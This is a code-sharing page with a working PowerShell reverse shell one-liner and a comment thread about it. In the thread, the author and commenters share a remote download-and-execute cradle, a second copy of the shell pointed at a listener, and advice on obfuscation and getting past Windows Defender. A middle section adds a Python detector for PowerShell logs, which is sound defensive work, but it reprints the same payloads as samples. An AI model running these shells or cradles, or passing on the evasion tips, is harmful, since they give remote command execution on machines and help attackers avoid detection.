PowerShell reverse shell one-liner by Nikhil SamratAshok Mittal (@samratashok)
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
ThunderSon commented Jul 9, 2018

Hello. Kindly check my fork of the project. The IP field has a typo.

egre55 (Owner, Author) commented Jul 9, 2018

Hey, thanks for the heads-up!

chnz2k commented Apr 15, 2019

Using sockets without obfuscation or string encryption is a high risk: Windows can log the data connection to the C&C server, and some firewalls such as ZoneAlarm block the packets.

T3nsh0 commented Aug 7, 2019

@chnz2k, how do you add obfuscation to a script?

egre55 (Owner, Author) commented Aug 9, 2019

The Invoke-Obfuscation project is definitely worth checking out, @PLEASEFORGETME2.

Vedant-Bhalgama commented Jul 25, 2020

Which listener can be used? Netcat, or msfconsole?

chnz2k commented Jul 25, 2020

Vedant-Bhalgama commented Jul 25, 2020

OK, but can we obfuscate this script? And when I run the script it says this.

[image: Capture]

chnz2k commented Jul 25, 2020

Vedant-Bhalgama commented Jul 25, 2020

Yes, it is working now! But how do I obfuscate it?

chnz2k commented Jul 25, 2020

Vedant-Bhalgama commented Jul 25, 2020

Thanks, mate!

Vedant-Bhalgama commented Jul 25, 2020

And where can I scan the .ps1 file for results? It doesn't work on antiscan.me, and nodistribute also doesn't work.

chnz2k commented Jul 25, 2020

Vedant-Bhalgama commented Jul 25, 2020

Hi!
I tried to run the code and I got a connection, but when I type any command the connection exits, and on the PowerShell side I have output like this:

[image: Capture]
[image: Capture]

Also, I am sharing the code which downloads the reverse shell .ps1 from the Kali server and executes it.
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4/mypowershell.ps1');mypowershell.ps1"

chnz2k commented Jul 25, 2020

Vedant-Bhalgama commented Jul 25, 2020

Also, it ran the first time, but the second time it was detected.

egre55 (Owner, Author) commented Jul 25, 2020

Try this: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')" @Vedant-Bhalgama

with your reverse shell looking like:

$client = New-Object System.Net.Sockets.TCPClient("10.0.2.4",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

You should get a shell on your Netcat listener on port 80.

chnz2k commented Jul 25, 2020

egre55 (Owner, Author) commented Jul 25, 2020

If you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with "#".
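Two points in this thread belong together from a defender's side: chnz2k's note that Windows can log the connection, and the observation just above that the "PS <path>> " prompt string is trivially swapped out. When PowerShell script block logging is enabled, the whole one-liner lands in the PowerShell Operational log (event 4104, ScriptBlockText field), so a detection should key on the structural combination of a raw socket feeding Invoke-Expression, not on a cosmetic string. The Python below is an added example written for this page, not code from the gist or its author; the log records are constructed to mimic the ScriptBlockText field (record 2 condenses the gist's one-liner, record 3 is the "#" variant, record 4 is the download cradle from the thread, record 5 is a benign socket check that must not fire).

```python
"""Flag reverse-shell and download-cradle patterns in PowerShell script block logs.

Constructed example for this thread (not the gist's code). Input mimics the
ScriptBlockText field of PowerShell Operational event 4104.
"""
import re
from typing import Dict, List

# Structural indicators. PowerShell is case-insensitive, so every pattern is too.
NET_PRIMITIVE = re.compile(r"System\.Net\.Sockets\.TcpClient|\.GetStream\(\)", re.I)
DYN_EXEC = re.compile(r"\b(iex|Invoke-Expression)\b", re.I)
DOWNLOAD = re.compile(r"\.DownloadString\(|\.DownloadData\(|Invoke-WebRequest|Invoke-RestMethod", re.I)
# Cosmetic indicator: the "PS <path>> " prompt the one-liner echoes back. It is
# easily removed (the thread swaps it for "#"), so it is reported but never decisive.
PROMPT_ECHO = re.compile(r'"PS "\s*\+', re.I)


def classify(script: str) -> List[str]:
    """Return the indicator tags present in one script block."""
    tags = []
    if NET_PRIMITIVE.search(script) and DYN_EXEC.search(script):
        tags.append("reverse_shell")      # raw socket wired to Invoke-Expression
    if DOWNLOAD.search(script) and DYN_EXEC.search(script):
        tags.append("download_cradle")    # fetch remote text, run it in memory
    if PROMPT_ECHO.search(script):
        tags.append("prompt_echo")
    return tags


def scan(events: List[Dict]) -> List[Dict]:
    """Return only the events that carry at least one indicator."""
    hits = []
    for ev in events:
        tags = classify(ev["script"])
        if tags:
            hits.append({"id": ev["id"], "host": ev["host"], "tags": tags})
    return hits


# Constructed sample records. Record 2 condenses the thread's one-liner; record 3
# is the same with the prompt string replaced by "#", as suggested in the thread.
REVERSE_SHELL = (
    '$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);'
    '$stream = $client.GetStream();'
    'while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){'
    '$sendback = (iex $data 2>&1 | Out-String );'
    '$sendback2 = $sendback + "PS " + (pwd).Path + "> ";'
    '$stream.Write($sendbyte,0,$sendbyte.Length)};$client.Close()'
)
REVERSE_SHELL_QUIET = REVERSE_SHELL.replace('"PS " + (pwd).Path + "> "', '"#"')

SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "script": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"id": 2, "host": "ws02", "script": REVERSE_SHELL},
    {"id": 3, "host": "ws02", "script": REVERSE_SHELL_QUIET},
    {"id": 4, "host": "ws03",
     "script": "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')"},
    # Benign: opens a socket but never feeds remote input to Invoke-Expression.
    {"id": 5, "host": "ws04",
     "script": '$tcp = New-Object System.Net.Sockets.TcpClient("intranet.example", 443); $tcp.Close()'},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"event {hit['id']} on {hit['host']}: {', '.join(hit['tags'])}")
```

Records 2 and 3 both come back as reverse_shell; the only difference is the weak prompt_echo tag, which is the point: a rule that matched on "PS " alone would go blind after the one-character change discussed above, while the socket-plus-iex combination survives it. Record 5 shows the false-positive guard, a TcpClient on its own is ordinary admin scripting.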

chnz2k commented Jul 25, 2020

Vedant-Bhalgama commented Jul 25, 2020

Yes! I am not using it for non-ethical purposes, bro! I am an ethical hacker and need this for pentesting purposes!

chnz2k commented Jul 25, 2020

Vedant-Bhalgama commented Jul 25, 2020

The script is running now, but it gives a detection error.
@egre55, what were you telling me to replace to evade Defender? Can you make the changes in the code?

[image: Capture]
